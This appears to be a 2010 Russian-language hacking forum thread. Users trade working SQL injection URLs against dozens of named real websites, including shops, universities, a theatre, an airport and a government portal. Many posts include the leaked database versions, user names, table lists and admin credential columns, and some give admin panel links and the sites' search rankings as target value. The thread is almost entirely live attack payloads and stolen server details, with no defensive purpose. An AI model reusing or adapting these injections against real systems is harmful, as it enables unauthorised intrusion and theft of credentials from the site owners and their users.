http://www.submitexpress.com/news/shownews.php?article=-529+union+select+1,2,3,4,concat(version(),0x3a,use r(),0x3a,database()),6,7--
version: 5.0.90-community
user: yourwebf_rssuser@208.96.34.202
database: yourwebf_rss-links
BlackFan
14.06.2010, 01:27
http://lapsi-mm.ru/list.php?filterSECTION=-1'+union+select+concat_ws(0x3a,login,password)+fro m+b_user+--+
u178433
u178433@10.9.11.22
5.0.67-log
http://dotgame.ru/index.php?action=news&newsid=-55+union+select+1,database(),3,4,5,6,7--
если кто роскрутит отпишыте в ЛС
http://www.interfax.kz/?lang=rus&int_id=10&function=view&news_id=-1758+union+select+1,2,3,4,5,concat_ws(0x3a,version (),database(),user(),@@version_compile_os),7,8,9,0 ,1+from+s13_users
5.0.67:dbinter1:dbinter1@w5.isd.kz:redhat-linux-gnu
http://www.tutpricol.ru/message.php?id=-117+union+select+1,2,3,concat(version(),0x3a,user( ),0x3a,database()),5--
version: 4.1.25-log
user: tutpric5_root@localhost
database: tutpric5_tutpricol
LanSilot
14.06.2010, 10:53
http://www.berdyansk.su/view_news.php?id_news=-5393+union+all+select+1,2,3,4,5,concat(version(),0 x3a,user(),0x3a,database()),7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21--
version: 5.0.89-community-log
user: berdyans_berdyan@localhost
database: berdyans_gorportal
DezMond™
14.06.2010, 16:32
viragkzn.ru пр2 тиц300
http://www.viragkzn.ru/index.php?option=com_content&task=view&id=-197+union+select+1+--+&Itemid=278
sitraf.ru пр1
http://sitraf.ru/mnenie.php?ide=-135'+union+select+1,2,3,4,5+--+&PHPSESSID=smkbm6ueoh9uu47ul83adl9fc4
buhta.ru тиц110
http://www.buhta.ru/index.phtml?kind=news&nid=241+uNioN+sElEct+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16+--+
moonmebel.ru пр3 тиц50
http://moonmebel.ru/itemspec?sid=-171+uNioN+sElEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22+--+&i_mod=085&PHPSESSID=c7c0f8bb58204bec89baf64c49bf3997
emo.org пр5
http://www.emo.org/news_popup.php?home_id=-99+union+select+1,2,3,4,group_concat(column_name), 6,7,8,9,10,11+from+information_schema.columns+wher e+table_name=0x6D656D627265+--+
ogcnice.com пр6 тиц60
http://www.ogcnice.com/actualite/breve.php?id=-1918+union+select+1,2,3,4,5,group_concat(table_nam e),7+from+information_schema.tables+group+by+table _schema+limit+1,1+--+
nano.yaragrovuz.ru пр4
http://nano.yaragrovuz.ru/news/index.php?id=-9+union+select+1,2,3,4,user_name,6,7,8,9,user_pass word,11,12,13+from+users+--+
ecologik-business.com пр4
http://www.ecologik-business.com/Scripts/breve.php?id=-72+union+select+1,user(),3,4,concat_ws(0x3a3a,logi n,pwd)+from+admin+--+
ecotravail.com пр2
http://www.ecotravail.com/corporate/pages/breve.php?id=-15+union+select+1,2,3,4,concat_ws(0x3a3a,login,pwd )+from+admin+--+
clubactufoot.com пр3
http://www.clubactufoot.com/breve.php?id=-15+union+select+1,2,3,concat_ws(0x3a3a,id,nom,pren om,adresse,code_postal,ville,email,password,is_act ive),5+from+concours_membre+limit+24,1+--+
oceanikcreations.com пр3
http://www.oceanikcreations.com/index.php?ref=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17+--+&lang=FR
newstix.de пр4
http://www.newstix.de/index.php?site=actual&ref=RSS&entmsg=true&mid=-12216'+union+select+1,2,3,4,5,6,7,8+--+
rcbarakani.fr
http://www.rcbarakani.fr/breve.php?id=-4+union+select+1,2,3,4+--+
faiveley.com пр5
http://www.faiveley.com/uk/categorie.php?ID=-22+union+select+1,2,3,4+--+
games1.com
http://www7.games1.com/jeux.php?VIDJeux=-5115'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15+--+
jm2.fr пр2
http://www.jm2.fr/categorie.php?id=-6+union+select+1,2,3,group_concat(column_name),5,6 ,7,8,9,10,11,12,13,14,15,16,17+from+information_sc hema.columns+where+table_name=0x6163637565696C+--+
clubpresse.com пр5 тиц10
http://www.clubpresse.com/lyon/articles/-572'+union+select+1,2,3,4,concat_ws(0x3a3a,uid,ses sion,login,user_password,email,type),6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+f rom+be_user+limit+2,1+--+/
muzicisifaze.com пр4 тиц10
http://www.muzicisifaze.com/categorie.php?id=-1+uNioN+sEleCT+1,2,concat_ws(0x3a3a,id,name,passwo rd,priority),4,5,6,7,8,9+fRom+msf_admins+--+
destockage-grossiste.com пр3
http://www.destockage-grossiste.com/categorie.php?id=-16'+union+select+1,concat_ws(0x3a3a,id,email,pass, societe,nom,admin),user(),4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24+from+membre+--+
globalsscorp.com
http://www.globalsscorp.com/en/produit.php?id=97&parentcat=51&cat=-115+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19+--+
cegep-fxg.qc.ca пр5
http://www.cegep-fxg.qc.ca/fr/college/actualite/evenement.php?id=-1132+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
bourgogneannonces.bienpublic.com пр1
http://bourgogneannonces.bienpublic.com/categorie.php?id=-651+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+
boojum-mag.net пр5
http://www.boojum-mag.net/f/index.php?sp=liv&livre_id=-2047+union+select+user()+--+
chezvalgal.com пр2
http://www.chezvalgal.com/portfolio/categorie.php?id=-1+union+select+1,2,3,4,5,6,7+--+
joejackson.com пр5 тиц20
http://www.joejackson.com/news.php?id=94'+UniOn+sELect+1,2,3,4,5,concat_ws(0 x3a3a,name,pass),7,8,9,10,11,12,13,14+from+auth+--+&m=04&y=2008
archaeolinks.com пр5 тиц10
http://www.archaeolinks.com/news.php?user=12&spw=&lan=de&repno=-426+union+select+1,2,3,4,concat_ws(0x3a3a,lfdnr,Po sition,NName,VName,UName,PW,Access),6,7+from+mitar beiter+limit+10,1+--+&fromto=0
saka-asac.ch пр5 тиц10
http://www.saka-asac.ch/aktuelldetail.php?lfdnr=-227+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+
nemomusic.com пр4
http://www.nemomusic.com/emotive/fr/discographie.php?artist_id=&album_id=-72+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19+--+
golf4style.com пр3
http://www.golf4style.com/annuaire/categorie.php?id=-3'+union+select+1,concat_ws(0x3a3a,id,email,pass,c reation,societe,nom,prenom,rcs,tel,categorie,admin ,reponse,inactif),3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24+from+membre+--+
pro-pulse.net пр1
http://www.pro-pulse.net/categorie.php?id=-13'+union+select+1,2,concat_ws(0x3a3a,id,email,pas s,creation,societe,nom,prenom,rcs,tel,categorie,ad min,reponse,inactif),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23+from+membre+--+
hihostels-romania.ro пр5 тиц10
http://www.hihostels-romania.ro/static.php?id=4&lang=ro+union+select+1,2,3,4,5+--+
quelprenom.com пр4
http://www.quelprenom.com/prenom_enfant_celebrite.php?star_id=-25'+union+select+1,database(),3+/*+
shoptattoo.com пр2
http://www.shoptattoo.com/en/categorie.php?id=18'+union+select+1,2,3,4,5+--+
blogmap.it пр3
http://www.blogmap.it/blogs-categorie.php?c=Fotoblog&id=-6'+union+select+1,2,3,4,concat_ws(0x3a3a,username, password),6,7,8,9,10,11,12,13+from+crimemap_users+--+
partenaire-plus.com пр3
http://www.partenaire-plus.com/liste.php?art=spectacle+union+select+1,type+from+d evis+--+
diem.nl пр2
http://www.diem.nl/webshop/categorie.php?id=-11+uNion+sELect+1,2,3,4,5,6,7,unhex(hex(group_conc at(tAblE_nAmE))),9,10,11,12+from+information_schem a.tables+--+&x=9
wagenaarkoeltechniek.nl пр2
http://www.wagenaarkoeltechniek.nl/categorie.php?id=-59+union+select+1,2,3,4,5,6+--+
mouche-fr.com пр3 тиц10
http://www.mouche-fr.com/videos-peche-mouche/lecture-forum.php?id=-1074+union+select+1,2,3,4,5,6,7,8,9,10,11+from+pmn l_temp+--+
dirshop.nl
http://www.dirshop.nl/catalog/categorie.php?CATEGORIE=RVS%20Boltsnaps%20&%20Clips&ID=-1016+union+select+1,2,3,table_name,5,6,7,8,9,10,11 ,12+from+information_schema.tables+--+
swoopsky.fr
http://www.swoopsky.fr/categorie.php?id=401+union+select+1,concat_ws(0x3a 3a,login,password)+from+utilisateur+--+
spectromas.ro пр4 тиц10
http://www.spectromas.ro/categorie.php?id=-42'+union+select+1,2,3,4,5,6,7,8,9,id_admin,11,12+ from+admin+--+
matrixtgp.com
http://www.matrixtgp.com/categorie.php?to=-71+union+select+1,2,3,concat_Ws(0x3a3a,account_use rname,account_password),5+from+ttt1_accounts+--+
eroplaneet.nl
http://www.eroplaneet.nl/links/categorie.php?id=-2+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12 +from+information_schema.tables+--+
publicitatepublica.ro пр6
http://www.publicitatepublica.ro/publicitate.php?tip=detalii&anunt=-161+uNIon+seLECt+1,2,3,4,user(),6,7,8,9,10,11+from +admin+--+
art-time.co.il пр4
http://www.art-time.co.il/liste.php?artist=-6+union+select+1,user(),3,4,5+--+
soussanart.com пр4
http://www.soussanart.com/liste.php?artist=4+union+select+1,2,3+--+
safrai.com пр4 тиц10
http://www.safrai.com/liste.php?artist=56+union+select+1,2,3+--+
aviramart.com пр4
http://www.aviramart.com/details.php?artist=-4+union+select+1,2,database(),4,5,6,7,8,9+--+&&show=1132
clapmp.com пр4
http://www.clapmp.com/annuaire/fiche.php?id=-374+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21+from+annuaire+--+
miragallery.com
http://www.miragallery.com/AyalaBar.php?catid=-191+union+select+1,2,3,4,5,6,7,8+--+
bsselektronika.hu пр1
http://bsselektronika.hu/index.php?cat=-7+union+select+1,2,3,4,unhex(hex(database())),6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+&db=10
samptum.com
http://samptum.com/catp.php?catId=10001&prodId=-10001+union+select+1,2,3,4,5,6,user(),8,9,10,11,12 ,13+--+
farmaeco.com
http://www.farmaeco.com/catp.php?id=-6+union+select+database()+--+
nosolofrases.com пр2
http://www.nosolofrases.com/catp.php?t=3+union+select+1,2,3,4,5,6,7,8,9+--+
artisanat-bourgogne.fr пр4
http://www.artisanat-bourgogne.fr/artisans_metiers_art_bourgogne/actualites_metiers_arts_bourgogne/detail.php?id=-50+uNIon+sELEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+
cc-estuaire.fr пр3 тиц10
http://www.cc-estuaire.fr/cce_vie/fr/bdd_entreprises/fiche_entreprise.php?id_fiche=-147+union+select+1,2,concat_ws(0x3a3a,id,name,user name,email,password,usertype),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24+from+mos_user s+--+
feminin.annuaire-web-france.com пр4
http://feminin.annuaire-web-france.com/lien-vote.php?id_site_vote=-106+union+select+1,2,3,concat_ws(0x3a3a,login,pass word,nom,prenom,email,admin),5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25+from+utilisat eur+--+
primeale.fr пр3
http://www.primeale.fr/V2/rub.php?id_rub=10&id_art=-29+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,Id_ad min,Nom,Prenom,Login,Password,Droits),8+from+Admin s+--+
technopole-bordeaux-montesquieu.com пр4
http://www.technopole-bordeaux-montesquieu.com/fiche_entreprise.php?id_fiche=-5+union+select+1,database(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20+--+
astronomie2009.at пр6
http://www.astronomie2009.at/kalender/termin-anzeige.php?terminId=-17+union+select+1,2,3,4,5,6,7,8,9,10,database(),12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35+--+
mobile.iyachtpod.com пр3
http://mobile.iyachtpod.com/marinas-detail.php?id=-1+uNIon+sELEct+1,unhex(hex(group_concat(ColuMn_nAm E))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+f rom+infOrmAtion_schEmA.CoLumNs+where+table_name=0x 74626C5F6D6172696E61+--+
critic.fr пр4
http://www.critic.fr/detail_serie.php?serie=-194+union+select+group_concat(table_name)+from+inf ormation_schema.tables+group+by+table_schema+--+
dejantomic.com пр2
http://www.dejantomic.com/user.php?id=-137+Union+Select+1,2,3,4,5,concat_ws(0x3a3a,ID,Use rname,Password,Mail,Name,Gender,UserGroup),7+from+ DejanTomicUsers+where+UserGroup=20+--+
myfreeclipart.com пр5 тиц10
http://www.myfreeclipart.com/download.php?iid=-12835+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,database(),19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33+--+
magazinevideo.com пр3
http://www.magazinevideo.com/festivals-liste.php?lapage2=5&r=&Pays=&Lieu=&FullTexte=&All=&Date1=&Categorie=2+union+select+1,database(),3,4,5,6,7,8, 9,10,11+--+
francoisfabie.fr пр7
http://www.francoisfabie.fr/fab_art1.php?id_art=734&id_ref=-89+union+select+1+--+&id_class=38'
ПС БАЯНОВ НЕТУ!!! ПРОВЕРЕНО!
http://www.videocity.ru/news.html?news_id=103+and+1=2+union+select+1,2,3,4 ,concat_ws(0x3a,loginname,password),6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21+from+phplist_admin+--+a
http://www.skaters.ru/index.php?category_id=-8+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(t able_name)+from+information_schema.columns+where+c olumn_name+like+0x257061737325+--+a&page=2
http://www.outdoors.ru/russiaoutdoors/show_obj2.php?id=-5649+union+select+1,2,3,4,5,6,7,8,user(),10,11,12, 13,14,15,16,17+--+a
http://www.skuns.info/print.php?type=stats&id=-236'+union+select+1,2,group_concat(table_name),use r(),5,6,7,8,9,10,11,12,13,14,15,16+from+informatio n_schema.columns+where+column_name+like+0x25706173 7325+--+a
PR 6
http://www.avalanche.org/data.php?date=1998-1999&sort=&id=-3+union+select+1,2,3,4,5,6,group_concat(0x0b,table _name),8+from+information_schema.tables--
jecka3000
14.06.2010, 21:52
http://www.precisionbiologic.com/products/view_product.php?id=-17+union+select+concat(version(),0x20,database(),0 x20,user())--
5.0.90-log
precij4w_newprecision
precij4w_4@209.68.1.99
http://www.curlingwarmers.com/view_product.php?id=-46+union+select+concat(database(),0x20,version(),0 x20,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15--
5.0.77-log
u70375524@cgihost
LanSilot
14.06.2010, 22:04
"КОНСАЛТИНВЕСТ"
http://www.consult-invest.ru/news.php?id=-4881'+union+select+1,2,3,concat(username,0x3a,user _password),5,6,7,8,9,10,11,12,13+from+phpbb_users+ limit+1,1--+
PR 4
http://chgk.com.ru/person.php?id=-113+union+select+1,2,3,4,concat_ws%280x3a,version% 28%29,user%28%29,database%28%29%29,6,7%20--
4.1.25-log
chgkcom2_user@localhost
chgkcom2_chgk
http://www.hamptonrovers.com.au/news/news.php?newsid=-55+union+select+1,2,column_name,4,5,6+from+informa tion_schema.columns+where+table_name=0x7573657273+--
MySQL 5.0.90-community
http://www.hamptonrovers.com.au/news/news.php?newsid=-55+union+select+1,2,concat_ws(0x3a,id,username,pas sword),4,5,6+from+mymail_users+--
panel: http://www.hamptonrovers.com.au/admin/
LanSilot
15.06.2010, 08:40
ФОНД-FOREX
http://www.market-profit.com/news.php?id=-13+%27+union+all+select+1,2,3,concat(version(),0x3 a,user(),0x3a,database()),5--+
http://downloads.e3dengine.com/files.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3+--+
e3dengine.com@10.0.0.221: pages_e3dengine_com:5.0.90-log
LanSilot
15.06.2010, 15:30
Internet Money Portal
http://monitor.newimp.info/news.php?id=-45+%27+union+all+select+1,concat(id_user,0x3a,logi n,0x3a,haslo,0x3a,mail),3,4+from+users--+
www.cide.edu
http://www.cide.edu/investigador/profile.php?IdInvestigador=-179+or(1,1)=(select+count(0),concat((select+concat _ws(char(58),user(),version(),database(),@@version _compile_os)+from+mysql.user+limit+0,1),floor(rand (0)*2))from(information_schema.tables)group+by+2)--+
http://www.cide.edu/investigador/profile.php?IdInvestigador=-179+or(1,1)=(select+count(0),concat((select+concat (username,char(58),user_password)+from+bd_mapp.php bb_users+limit+1,1),floor(rand(0)*2))from(informat ion_schema.tables)group+by+2)--+
http://www.cide.edu/investigador/profile.php?IdInvestigador=-179+or(1,1)=(select+count(0),concat((select+concat (user,char(58),password)+from+mysql.user+limit+0,1 ),floor(rand(0)*2))from(information_schema.tables) group+by+2)--+
PR-7
http://www.lannaworld.com/cgi/lannaboard/reply_topic.php?id=-785+union+select+1,concat(version(),0x20,database( ),0x20,user()),3,4,5,6,7,8,9--
5.1.39-log
lannaworld
lannaworld@nassau.dreamhost.com
http://classes.dma.ucla.edu/Winter06/161B/projects/ed/DRAview.php?article=-2+union+select+1,concat(version(),0x20,database(), 0x20,user()),3,4,5,6,7,8,9,10,11,12,13--
5.0.77
edchao
edchao@ha.design.ucla.edu
http://www.economiaparatodos.com.ar/ver_nota.php?nota=-1+UNION+SELECT+1,concat_Ws%280x3a,user%28%29,datab ase%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20+--+
User: uv7450_ept@localhost
Database: ept_v3
Version: 5.0.45-Max-log
http://www.saltwatercharterswa.com.au/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28user%28%29, database%28%29,version%28%29%29,2,3,4+--+
Version: 5.0.51a-24
User: myswcw1000@ws-shared
Database: netswcwa_saltwatercharterswa_com_au
http://www.smu17.ru/story.php?id=-2+union+select+1,group_concat(0x0b,table_name)+fro m+information_schema.tables--
PR6
http://www1.assumption.edu/admin/hotnews/story.php?id=-2+union+select+1,group_concat(0x0b,name_usr,0x3a,p assword_usr),3,4,5,6,7,8+from+choir_admin--
http://mortgagehc.com/story.php?id=-2+union+select+1,2,3,group_concat(0x0b,table_name) +from+information_schema.tables--
BlackFan
15.06.2010, 19:50
http://wap.javagames.su/l/d/-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x3a,user_login,user_name,user_pass,md5_pass,user_e mail),13,14,15,16,17,18,19,20,21+from+_users+--+/admin_javagames@localhost
admin_javagames
5.1.14-beta
пароли отдельно в base64 и md5
http://poly.wao.ru/load/cat/all/0+union+select+1,2,concat_ws(0x3a,user(),database( ),version())/admin_wao_ru@localhost
admin_wao_ru
4.1.20
отображает и сразу редиректит
http://start-ukraine.com/start.php?action=show&lng=ukr&db=news&id=220+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16--
User: startukrai_1@localhost
Database: startukrai_db
Version: 5.0.89
OS: portbld-freebsd6.2
tables:
about
akciya
category
contacts
distributors
gazeta
menu
news
prod
product
s_about
s_akciya
s_category
s_contacts
s_distributors
s_gazeta
s_menu
s_news
s_prod
s_product
s_useful
s_user
useful
user
testtable
user:
user_id,user_login,user_password,user_fname,user_s urname,user_lname,user_email,user_info,user_type,u ser_active
http://start-ukraine.com/start.php?action=show&lng=ukr&db=news&id=220+union+select+1,concat_ws(0x3a,user_id,user_ login,user_password,user_email,user_type),3,4,5,6, 7,8,9,10,11,12,13,14,15,16+FROM+user--
бля я сёдня пьяный.....выложу что я нарыл
http://www.startmarketing.ru/about-05.php?newsid=57+and+1=2+union+select+concat_ws(0x 3a,username,password)+from+opros_users+limit+0,1--
www.wri.org
http://earthtrends.wri.org/maps_spatial/index.php?p=2&theme=-5+union+select+1,aes_decrypt(aes_encrypt(concat_ws (char(58),user(),version(),database(),@@version_co mpile_os),1),1),3,4+from+information_schema.tables/*
PR-8
:(
PR 6
http://www.fullframefest.org/more_film_info.php?id=-74+UNION+SELECT+1,2,concat_ws%280x3a,version%28%29 ,user%28%29,database%28%29%29,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22%20--
5.0.90-community-log
fullfram_admin@localhost
fullfram_films
http://www.reg-markets.org/publications/abstract.php?pid=-1127+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,gr oup_concat(logname,char(58),password),15,16,17,18, 19+from+admindetails
PR-6
life_glider
16.06.2010, 00:01
http://www.coppades-nepal.org/files/ict_school_detail.php?school_id=-5%20union%20select%201,2,3,4,%28select%20@@version _compile_os%29,6,7
http://www.zhivayaperm.ru/progprint.php?day=-2%27%20union%20select%201,2,3,4,5,concat_ws%280xa, TABLE_SCHEMA,TABLE_NAME%29,7,8,9,10%20from%20infor mation_schema.tables/*
http://www.eltkboys.com/eltk.php?day=-1%20union%20select%20group_concat(table_name),2,3% 20from%20information_schema.tables%20where%20table _type=CHAR(66,%2065,%2083,%2069,%2032,%2084,%2065, %2066,%2076,%2069)
http://info.web.lehigh.edu/CEE/story.php?id=-2+union+select+1,2,3,4,5,6,group_concat(0x0b,user_ name,0x3a,password),8+from+users--
онлайн казино
http://slingogaming.com/slingo_casino_news-story.php?id=-2+union+select+1,group_concat(0x0b,table_name),3,4 ,5+from+information_schema.tables--
http://www.brentsando.com/bb/story.php?id=-2+union+select+1,2,group_concat(0x0b,table_name),4 ,5,6+from+information_schema.tables--
Государственный Академический МАЛЫЙ ТЕАТР
http://www.maly.ru/news_more.php?number=1&day=16&month=6&year=-2010+and+1=2+union+select+1,2,concat_ws(char(58),@ @version,user(),database(),@@version_compile_os),4 ,5,6,7,8,9,10,11,12,13,14,15+--
version : 4.1.25
user : root@localhost
database : maly
os : portbld-freebsd7.2
http://www.maly.ru/news_more.php?number=1&day=16&month=6&year=-2010+and+1=2+union+select+1,2,user,4,5,6,7,8,9,10, 11,12,13,14,15+from+mysql.user--
Первая :)
http://www.yar-rugby.ru/news.php?id=378+and+1=0+union+select+1,2,concat(us ername,0x3a,userpass),4,5+from+poll_user--
Таблы:
CHARACTER_SETS
CLIENT_STATISTICS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
INDEX_STATISTICS
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TABLE_STATISTICS
TRIGGERS
USER_PRIVILEGES
USER_STATISTICS
VIEWS
galery
gallery
gandbol
media
news
online
players
poll_comment
poll_config
poll_data
poll_index
poll_ip
poll_log
poll_templates
poll_templateset
poll_user
seven
http://www.anglofrenchbedandbreakfast.com/select.php?id=-86+union+select+1,2,3,4,5,6,concat_ws%280x3a,versi on%28%29,user%28%29,database%28%29%29,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51,52,53,54,55,56,57,58%20--
Version: 4.1.20-log
User: uAFBB@localhost
Database: dbAFBB
http://www.glemmtalerhof.at/index.php?id=14+union+select+1,2,3,4,5,6,7,8,9,10, 11,concat_ws%280x3a,version%28%29,user%28%29,datab ase%28%29%29,13,14,15,16%20--
Version: 5.0.90
User: p16202@localhost
Database: usr_p16202_1
*uNkN0Wn*
16.06.2010, 13:43
http://www.nispa.sk/_portal/conference.php?sid=588&cid=-18+union+select+1,version%28%29,3,4,5,6,7,8%20--
ver. 4.1.22-log
PR-6
http://www.prodnepr.dp.ua/theatres.php3?theatres=-1663+union+all+select+1,2,concat_ws(0x3a,@@version ,user(),database(),@@version_compile_os),4,5,6,7,8 ,9,10,11+--
version : 5.0.77
user : prodp@localhost
database : topmanager7_prodneprdp
os : redhat-linux-gnu
CyberHunter
16.06.2010, 15:08
http://www.nolimitsafc.com/main/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28user(),vers ion(),database()%29,2,3,4+from+jos_users--
Version: 5.1.47-community-log
User: nolimit5_main@localhost
Database: nolimit5_main
PR: 2
http://www.nationalintegrationmovement.org/eng/index2.php?id=nim-diskusi-eng/nim-diskusi-engDetail&nim-diskusi-engid=-379+union+select+1,2,3,4,5,concat(username,char(58 ),password),7,8,9,10,11,12,13,14,15,16+from+admin
.:[melkiy]:.
16.06.2010, 20:16
http://ishodniki.ru/art/print.php?cat=&id=-779+union+select+1,2,3,4,group_concat(concat_ws(0x 3a,id_member,member_name,id_group,passwd,password_ salt)),6,7,8,9,10,11,12,13,14,15+from+u51903_forum .smf_members+where+id_group=1+--+&show=net
http://www.thewalkingstick.de/popups/life.php?id=-1+union+select+1,concat(user(),database(),version( )),3,4,5,6,7,8+from+information_schema.tables--
web237@localhost
usr_web237_15.0.51
5.0.51a-24+lenny3-log
Свердловский Академический Театр Драмы
http://www.uraldrama.ru/press.php?id=-101+and+1=2+union+select+1,2,3,4,concat_ws(0x3a,@@ version,user(),database(),@@version_compile_os),6+--
version : 5.0.88
user : uraldramaru@localhost
database : uraldramaru
os : portbld-freebsd8.0
аэропорт ТОМСК
http://tomskairport.ru/news/?id=-112+and+1=2+union+select+1,2,concat_ws(char(58),@@ version,user(),database(),@@version_compile_os),4, 5,6,7,8,9,10,11+--
version : 5.0.51a-24+lenny3
user : airport@localhost
database : airport
os : debian-linux-gnu
.:[melkiy]:.
17.06.2010, 12:13
Сайт первого в СНГ фан-клуба AS Roma
http://as-roma.ru/showtext.php?mode=fanclub&textid=-fanclub3'+union+select+1,2,3,4,concat_ws(0x3a,vers ion(),user(),database()),6,7,8,9,10+and+'1'='1
vu.edu.au
http://jipam.vu.edu.au/article.php?sid=1151+and+1=0+union+select+1,2,vers ion(),4,5,6,7,8,9,10,11,12,13,14
PR-7
Яндекс тИЦ (CY) 1000
Google PageRank (PR) 5
http://tp.tatcenter.ru/goods-information.php?&gid=344646+union+select+1,concat_ws(0x3a,login,pas sword,permissions),3,4+from+admins+--+a
http://tp.tatcenter.ru/goods-information.php&gid=344646+union+select+1,group_concat(table_name) ,3,4+from+information_schema.columns+where+column_ name+like+0x2570617325+--+a
админка:http://tp.tatcenter.ru/admin/
если покопаться то можно вытащить пасы от админок с других поддоменов. . . .
http://www.latakia-city.gov.sy/index.php?p_name=news_item_view&id=-29+union+select+1,2,3,4,5,6,7,8,9,10,group_concat( username,char(58),password),12+from+admins
life_glider
17.06.2010, 13:52
http://www.veroint.com/products.php?page_id=-1%20union%20select%201,2,3,group_concat(table_name )%20from%20information_schema.tables%20where%20TAB LE_ROWS%3E0
http://www.hipertin.ru/index.php?id=-172+and+1=2+union+select+1,concat_ws(0x3a,@@versio n,database(),user(),@@version_compile_os),3--
version : 4.0.27-log
user : hipertin@zvm21.host.ru
database : hipertin
os : i86pc-solaris2.9
http://www.store-apple.ru/catalog.htm?product_id=10+UNION+SELECT+1,2,concat_ ws(0x3a,version(),database(),user(),@@version_comp ile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
Database Version: 5.0.90-community
Database name: itbala_iphonezakaz
User name: itbala_alex@localhost
Os:unknown-linux-gnu
Яндекс тИЦ (CY) 425
Google PageRank (PR) 5
Посещалка - 11к
http://www.fashionbank.ru/models/user/-1330'+union+select+group_concat(table_name,':',tab le_schema,';'),2,3,database(),5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,6 3,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79, 80,81,82,83,84,85+from+information_schema.columns+ where+column_name+like+0x2570617325+--+a.html
http://www.fashionbank.ru/models/user/-1330'+union+select+concat_ws(0x3a,login,password), 2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54 ,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,7 1,72,73,74,75,76,77,78,79,80,81,82,83,84,85+from+s tat.cns_users+--+a.html
PR 8
http://www.poseidon.hcmr.gr/listview.php?id=-18+union+select+concat%28username,0x3a,password%29 +from+ecsusers+limit+0,1%20--
5.0.77
www_poseidon@iris5004.ath.hcmr.gr
project_poseidon
http://www.rusug.ru/index.php?tree=8&mode=view&id=-7+union+select+concat_ws(0x3a,version(),database() ,user(),@@version_compile_os),2,3,4,5,6/*
5.0.26-log:ikarhomcen_rusug:ikarhomcen_rusug@localhost:pc-linux-gnu
http://www.ttparliament.org/publications.php?mid=-1)+or(1,1)=(select+count(0),concat((select+databas e()+from+cms_menus_configs+limit+0,1),floor(rand(0 )*2))from(cms_menus_configs)group+by+2)--+
DezMond™
17.06.2010, 17:54
lefuretscience.fr пр2
http://lefuretscience.fr/video.php?num=-701+uNIon+sELEct+1,2,3,4,5,6,7,8,9,10,concat_ws(0x 3a3a,groupval,pwd,name,mail)+from+ntux2_users+--+
scopeconcept.fr пр2
http://www.scopeconcept.fr/blog/eros/vision/modif.php?id=-1260+union+select+1,2,3,group_concat(table_name),5 ,6,7,8+from+information_schema.tables+--+
briefkasten-finden.de пр2
http://briefkasten-finden.de/briefkasten.php?briefkasten_id=-134+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19+from+information_schema.tables+--+
sitecgroup.com пр4
http://sitecgroup.com/vacancies/vacancy_search.php?recID=-1508+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18+--+
btsati.org пр3
